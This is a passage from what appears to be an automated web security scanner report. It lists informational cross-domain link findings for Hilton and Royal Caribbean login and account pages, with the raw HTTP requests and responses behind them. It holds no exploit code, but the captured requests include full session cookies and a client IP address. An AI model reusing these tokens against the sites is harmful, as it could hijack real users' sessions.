Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=; s_cc=true; s_nr=1317646515523-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 144503
Cache-Control: no-cache, no-store
Expires: Mon, 03 Oct 2011 12:55:11 GMT
Date: Mon, 03 Oct 2011 12:55:11 GMT
Connection: close

<!DOCTYPE html> <html xmlns:fb="http://www.facebook.com/2008/fbml" lang="en-US"
> <head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Language" conte
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_8/5/rating.gif" alt="3.8 / 5" title="3.8 / 5"/>
</div>
...[SNIP]...
<div id="BVRRRatingsHistogramButtonScript_aj6qrfkrn163rh6ye9jtj5ott_ID" class="BVRRRatingsHistogramButtonScript BVRRHidden"> <img src="http://opentable.ugc.bazaarvoice.com/static/0938/openRatingsHistogram.gif"
alt="Open Ratings Snapshot"
name="BV_TrackingTag_Rating_Summary_1_ExpandHistogram_200"
class="BVRRRatingsHistogramButtonImage"
onmouseover="bvHistogramMouseover(this, 'BVRRHistogramTimer_hafscwu2mmemi814ta0mr4yn2_ID', 'BVRRRatingsHistogramButtonPopin_f2m0reqv04je3z0nnmhyl3hhu_ID', 'RatingsHistogramFrame');"
onmouseout="bvHistogramMouseout('BVRRHistogramTimer_hafscwu2mmemi814ta0mr4yn2_ID', 'BVRRRatingsHistogramButtonPopin_f2m0reqv04je3z0nnmhyl3hhu_ID', 1000);" />
<div id="BVRRRatingsHistogramButtonPopin_f2m0reqv04je3z0nnmhyl3hhu_ID" class="BVRRRatingsHistogramButtonPopin">
...[SNIP]...
<a name="BV_TrackingTag_Rating_Summary_1_ExpandHistogram_200" target="_blank" href="http://reviews.opentable.com/0938/200/ratingsnapshot.htm"> <img src="http://opentable.ugc.bazaarvoice.com/static/0938/openRatingsHistogram.gif" alt="Open Ratings Snapshot" />
</a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_7/5/ratingSecondary.gif" alt="3.7 / 5" title="3.7 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_1/5/ratingSecondary.gif" alt="4.1 / 5" title="4.1 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_5/5/ratingSecondary.gif" alt="3.5 / 5" title="3.5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_5/3/ratingSlider.gif" alt="2.5 / 3" title="2.5 / 3" />
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_8/5/rating.gif" alt="3.8 / 5" title="3.8 / 5"/>
</div>
...[SNIP]...
<div id="BVRRRatingsHistogramButtonScript_tmm6r71r677rk5jqfgqpite2b_ID" class="BVRRRatingsHistogramButtonScript BVRRHidden"> <img src="http://opentable.ugc.bazaarvoice.com/static/0938/openRatingsHistogram.gif"
alt="Open Ratings Snapshot"
name="BV_TrackingTag_Rating_Summary_2_ExpandHistogram_200"
class="BVRRRatingsHistogramButtonImage"
onmouseover="bvHistogramMouseover(this, 'BVRRHistogramTimer_ma6bos8kvvc0m375a8yhenuj4_ID', 'BVRRRatingsHistogramButtonPopin_6wmyv3mvjwp58e8d6cqwkzgkl_ID', 'RatingsHistogramFrame');"
onmouseout="bvHistogramMouseout('BVRRHistogramTimer_ma6bos8kvvc0m375a8yhenuj4_ID', 'BVRRRatingsHistogramButtonPopin_6wmyv3mvjwp58e8d6cqwkzgkl_ID', 1000);" />
<div id="BVRRRatingsHistogramButtonPopin_6wmyv3mvjwp58e8d6cqwkzgkl_ID" class="BVRRRatingsHistogramButtonPopin">
...[SNIP]...
<a name="BV_TrackingTag_Rating_Summary_2_ExpandHistogram_200" target="_blank" href="http://reviews.opentable.com/0938/200/ratingsnapshot.htm"> <img src="http://opentable.ugc.bazaarvoice.com/static/0938/openRatingsHistogram.gif" alt="Open Ratings Snapshot" />
</a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_7/5/ratingSecondary.gif" alt="3.7 / 5" title="3.7 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_1/5/ratingSecondary.gif" alt="4.1 / 5" title="4.1 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_5/5/ratingSecondary.gif" alt="3.5 / 5" title="3.5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_5/3/ratingSlider.gif" alt="2.5 / 3" title="2.5 / 3" />
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/rating.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_0/5/ratingSecondary.gif" alt="4 / 5" title="4 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/5/ratingSecondary.gif" alt="2 / 5" title="2 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_0/5/ratingSecondary.gif" alt="4 / 5" title="4 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/3/ratingSlider.gif" alt="Energetic" title="Energetic" />
</div>
...[SNIP]...
book&amp;url=http%3A%2F%2Freviews.opentable.com%2F0938%2F200%2Freviews.htm%3FreviewID%3D24524488&amp;title=__TITLE__&amp;robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://opentable.ugc.bazaarvoice.com/static/0938/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_0/5/rating.gif" alt="4 / 5" title="4 / 5"/>
</div>
...[SNIP]...
<span class="BVRRLinkSpan"><img src="http://opentable.ugc.bazaarvoice.com/static/0938/noAvatar.gif" alt="Customer Avatar" title="Customer Avatar"/></span>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_0/5/ratingSecondary.gif" alt="4 / 5" title="4 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_0/5/ratingSecondary.gif" alt="4 / 5" title="4 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_0/5/ratingSecondary.gif" alt="4 / 5" title="4 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/3/ratingSlider.gif" alt="Moderate" title="Moderate" />
</div>
...[SNIP]...
book&amp;url=http%3A%2F%2Freviews.opentable.com%2F0938%2F200%2Freviews.htm%3FreviewID%3D24480565&amp;title=__TITLE__&amp;robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://opentable.ugc.bazaarvoice.com/static/0938/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/rating.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<span class="BVRRLinkSpan"><img src="http://opentable.ugc.bazaarvoice.com/static/0938/noAvatar.gif" alt="Customer Avatar" title="Customer Avatar"/></span>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_0/5/ratingSecondary.gif" alt="4 / 5" title="4 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/ratingSecondary.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_0/5/ratingSecondary.gif" alt="4 / 5" title="4 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/3/ratingSlider.gif" alt="Moderate" title="Moderate" />
</div>
...[SNIP]...
book&amp;url=http%3A%2F%2Freviews.opentable.com%2F0938%2F200%2Freviews.htm%3FreviewID%3D24321913&amp;title=__TITLE__&amp;robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://opentable.ugc.bazaarvoice.com/static/0938/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/rating.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<span class="BVRRLinkSpan"><img src="http://opentable.ugc.bazaarvoice.com/static/0938/noAvatar.gif" alt="Customer Avatar" title="Customer Avatar"/></span>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/ratingSecondary.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/ratingSecondary.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/ratingSecondary.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/3/ratingSlider.gif" alt="Energetic" title="Energetic" />
</div>
...[SNIP]...
book&amp;url=http%3A%2F%2Freviews.opentable.com%2F0938%2F200%2Freviews.htm%3FreviewID%3D24052481&amp;title=__TITLE__&amp;robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://opentable.ugc.bazaarvoice.com/static/0938/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/rating.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<span class="BVRRLinkSpan"><img src="http://opentable.ugc.bazaarvoice.com/static/0938/noAvatar.gif" alt="Customer Avatar" title="Customer Avatar"/></span>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/ratingSecondary.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_0/5/ratingSecondary.gif" alt="4 / 5" title="4 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/ratingSecondary.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/3/ratingSlider.gif" alt="Moderate" title="Moderate" />
</div>
...[SNIP]...
book&amp;url=http%3A%2F%2Freviews.opentable.com%2F0938%2F200%2Freviews.htm%3FreviewID%3D23810517&amp;title=__TITLE__&amp;robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://opentable.ugc.bazaarvoice.com/static/0938/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/rating.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/ratingSecondary.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/ratingSecondary.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/ratingSecondary.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/3/ratingSlider.gif" alt="Energetic" title="Energetic" />
</div>
...[SNIP]...
book&amp;url=http%3A%2F%2Freviews.opentable.com%2F0938%2F200%2Freviews.htm%3FreviewID%3D23761271&amp;title=__TITLE__&amp;robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://opentable.ugc.bazaarvoice.com/static/0938/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/rating.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/ratingSecondary.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/ratingSecondary.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/ratingSecondary.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/3/ratingSlider.gif" alt="Moderate" title="Moderate" />
</div>
...[SNIP]...
book&amp;url=http%3A%2F%2Freviews.opentable.com%2F0938%2F200%2Freviews.htm%3FreviewID%3D23727521&amp;title=__TITLE__&amp;robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://opentable.ugc.bazaarvoice.com/static/0938/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/rating.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/ratingSecondary.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/ratingSecondary.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/ratingSecondary.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/3/ratingSlider.gif" alt="Energetic" title="Energetic" />
</div>
...[SNIP]...
book&amp;url=http%3A%2F%2Freviews.opentable.com%2F0938%2F200%2Freviews.htm%3FreviewID%3D23678407&amp;title=__TITLE__&amp;robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://opentable.ugc.bazaarvoice.com/static/0938/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/rating.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<span class="BVRRLinkSpan"><img src="http://opentable.ugc.bazaarvoice.com/static/0938/noAvatar.gif" alt="Customer Avatar" title="Customer Avatar"/></span>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/ratingSecondary.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/5/ratingSecondary.gif" alt="2 / 5" title="2 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/5/ratingSecondary.gif" alt="2 / 5" title="2 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/3/ratingSlider.gif" alt="Moderate" title="Moderate" />
</div>
...[SNIP]...
book&amp;url=http%3A%2F%2Freviews.opentable.com%2F0938%2F200%2Freviews.htm%3FreviewID%3D23594671&amp;title=__TITLE__&amp;robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://opentable.ugc.bazaarvoice.com/static/0938/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/5/rating.gif" alt="2 / 5" title="2 / 5"/>
</div>
...[SNIP]...
<span class="BVRRLinkSpan"><img src="http://opentable.ugc.bazaarvoice.com/static/0938/noAvatar.gif" alt="Customer Avatar" title="Customer Avatar"/></span>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/5/ratingSecondary.gif" alt="2 / 5" title="2 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_0/5/ratingSecondary.gif" alt="4 / 5" title="4 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/ratingSecondary.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/3/ratingSlider.gif" alt="Moderate" title="Moderate" />
</div>
...[SNIP]...
book&amp;url=http%3A%2F%2Freviews.opentable.com%2F0938%2F200%2Freviews.htm%3FreviewID%3D23586891&amp;title=__TITLE__&amp;robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://opentable.ugc.bazaarvoice.com/static/0938/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
<div class="BVDI_FBImage"><img src="http://opentable.ugc.bazaarvoice.com/static/0938/filteringBusy.gif" alt="Filtering is in progress. Please wait until it completes." title="Filtering is in progress. Please wait until it completes."/></div>
...[SNIP]...
17.19. https://secure.hilton.com/en/hhonors/signup/hhonors_enroll.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.hilton.com
Path:   /en/hhonors/signup/hhonors_enroll.jhtml

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

POST /en/hhonors/signup/hhonors_enroll.jhtml?_DARGS=/en/crm/signup/hhonors_enroll.jhtml HTTP/1.1
Host: secure.hilton.com
Connection: keep-alive
Content-Length: 984
Cache-Control: max-age=0
Origin: https://secure.hilton.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://secure.hilton.com/en/hhonors/signup/hhonors_enroll.jhtml
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; mmid=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; JSESSIONID=S2VXAICTPUQJWCSGBIYMVCQ; mmcore.tst=0.221; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635958678:ss=1317635584777

phone=000-000-0000&_D%3Aphone=+&successURL=%2Fen%2Fhhonors%2Fsignup%2Fhhonors_confirm.jhtml&_D%3AsuccessURL=+&%2Fcom%2Fhilton%2Fcrm%2Fclient%2Fhandler%2FUserEnrollFormHandler.failureURL=%2Fen%2Fhhonor
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Server: Netscape-Enterprise/6.0
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Location: /en/hhonors/signup/hhonors_enroll.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?eventType=null&prvPage=signInPage&fast_res=null&_requestid=21636
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:59:45 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Content-Length: 134403

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/
...[SNIP]...
<td><script src=https://seal.verisign.com/getseal?host_name=secure.hilton.com&size=S&use_flash=YES&use_transparent=YES&lang=en></script>
...[SNIP]...
17.20. https://secure.hilton.com/en/hi/login/login.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.hilton.com
Path:   /en/hi/login/login.jhtml

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /en/hi/login/login.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?_requestid=21183 HTTP/1.1
Host: secure.hilton.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hilton.com/en/hi/info/site_usage.jhtml
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; ClrSSID=1317646383790-9086; mmcore.tst=0.391; mmid=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635914358:ss=1317635584777; JSESSIONID=S2VXAICTPUQJWCSGBIYMVCQ

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
Content-Length: 33818
Date: Mon, 03 Oct 2011 12:58:38 GMT
Connection: keep-alive


<!--suppress top nav sign in widget -->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


    <HTML>
<HEAD>

           <TITLE>Login Page</TITLE>
           
           
           <LINK re
...[SNIP]...
<td><script src=https://seal.verisign.com/getseal?host_name=secure.hilton.com&size=S&use_flash=YES&use_transparent=YES&lang=en></script>
...[SNIP]...
17.21. https://secure.hilton.com/en/hi/mytravelplanner/my_account.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.hilton.com
Path:   /en/hi/mytravelplanner/my_account.jhtml

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

POST /en/hi/mytravelplanner/my_account.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?_DARGS=/en/crm/login/widget_homepage.jhtml.8 HTTP/1.1
Host: secure.hilton.com
Connection: keep-alive
Content-Length: 798
Cache-Control: max-age=0
Origin: http://www.hilton.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hilton.com/en/hi/info/site_usage.jhtml
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; ClrSSID=1317646383790-9086; mmcore.tst=0.391; mmid=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635914358:ss=1317635584777

%2Fcom%2Fhilton%2Fcrm%2Fclient%2Fhandler%2FLoginFormHandler.failureURL=%2Fen%2Fhi%2Flogin%2Flogin.jhtml&_D%3A%2Fcom%2Fhilton%2Fcrm%2Fclient%2Fhandler%2FLoginFormHandler.failureURL=+&%2Fcom%2Fhilton%2F
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Server: Netscape-Enterprise/6.0
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Location: /en/hi/login/login.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?_requestid=21190
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:58:36 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Content-Length: 49638

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>



...[SNIP]...
<td><script src=https://seal.verisign.com/getseal?host_name=secure.hilton.com&size=S&use_flash=YES&use_transparent=YES&lang=en></script>
...[SNIP]...
</style>


Double Dip&reg; your way. You can choose your Earning Style from three rewarding options! Select the option you prefer, in you HHonors membership profile. Click <a href="https://www.hiltonhhonors.com/myway/index.aspx?adId=hhhomepage,myway,30">here</a>
...[SNIP]...
17.22. https://secure.royalcaribbean.com/beforeyouboard/getCountdownToCruise.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.royalcaribbean.com
Path:   /beforeyouboard/getCountdownToCruise.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /beforeyouboard/getCountdownToCruise.do?cS=NAVBAR&pnav=4&snav=6 HTTP/1.1
Host: secure.royalcaribbean.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
